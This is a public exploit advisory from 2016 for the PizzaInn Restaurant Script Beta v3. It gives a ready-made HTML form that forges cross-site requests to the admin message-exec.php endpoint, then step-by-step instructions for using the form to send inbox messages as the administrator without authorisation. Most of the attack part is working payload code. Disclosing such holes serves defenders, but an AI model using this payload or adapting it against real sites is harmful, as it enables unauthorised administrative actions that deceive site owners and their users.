PizzaInn version Beta 3 suffers from a cross site request forgery vulnerability in message-exec.php.
3ef08c42f4aa619bb2c1e3262914c174909b84c7f4ba0b62920a2b2531122987
# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (message-exec.php) - CSRF Send Inbox Message.
# Author :------------------------ : Nassim Asrir
# Author Company :------------------------ : HenceForth
# Author Email :------------------------ : wassline@gmail.com
# Google Dork :---------------- : -
# Date :-------------------------- : 20/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html
############################ CSRF Send Inbox Message Vulnerabilty ############################
## Exploit ##
<h1>Messages Management </h1>
</div>
<div id="container">
<form id="messageForm" name="messageForm" method="post" action="http://localhost/script/admin/message-exec.php" onsubmit="return messageValidate(this)">
<table width="540" border="0" cellpadding="2" cellspacing="0" align="center">
<CAPTION><h3>SEND A MESSAGE</h3></CAPTION>
<tr>
<th width="200">Subject</th>
<td width="168"><input type="text" name="subject" id="subject" class="textfield" /></td>
</tr>
<tr>
<th width="200">Message Box</th>
<td width="168"><textarea name="txtmessage" class="textfield" rows="5" cols="60"></textarea></td>
</tr>
<tr>
<td> </td>
<td align="center"><input type="submit" name="Submit" value="Send Message" />
<input type="reset" name="Reset" value="Clear Field" /></td>
</tr>
</table>
</form>
<hr>
<table border="0" width="1000" align="center">
<CAPTION><h3>CSRF By Nassim Asrir</h3></CAPTION>
## Proc ##
- P.S: You must to register in the site to see the Inbox Message send by Admin.
- Create a .html File and Put the Code.
- Navigate the File in your Localhost .
- and Create Message in The Text Box and you redirect to http://site/script/admin/access-denied.php
- and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to Your account . and you can see [Inbox] Navigate it and you see the Message .